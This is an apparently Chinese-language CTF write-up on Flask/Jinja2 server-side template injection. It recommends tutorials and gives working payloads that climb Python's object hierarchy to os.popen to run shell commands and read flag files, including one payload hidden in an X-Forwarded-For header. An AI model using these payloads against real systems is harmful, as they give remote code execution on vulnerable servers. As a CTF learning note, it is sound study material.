Web_python_template_injection
flask模版注入不会啊,只能面向搜索引擎,已经入土了
首先是推荐两篇好文:
1.从零学习flask模板注入
(其实是从入门到入土,小白强推这篇)
2.Flask/Jinja2 SSTI && python 沙箱逃逸
3.服务端模板注入攻击 (SSTI)之浅析
4.利用SSTI漏洞获取服务器Shell
5.Python——flask漏洞探究
不管现在还懂不懂原理,有payload模版就模仿着肝吧!
1.测试是否有注入点
{{1+1}} 之类的,成功执行则说明有模版注入
接下来是多个wp…
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}
过程:
总的来说
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要执行的语句").read()}}
miniL Personal_IP_Query
放dlwp防忘 毕竟是想了好久的题目
http://e0579dc296f4fa31220536d95e3b68b5.challenge.mini.lctf.online:1080/?class=__class__&mro=__mro__&subclasses=__subclasses__&init=__init__&globals=__globals__&popen=popen&cmd=cat /flag
X-Forwarded-For: {{ ()[request.args.class][request.args.mro][-1][request.args.subclasses]()[127][request.args.init][request.args.globals][request.args.popen](request.args.cmd).read() }}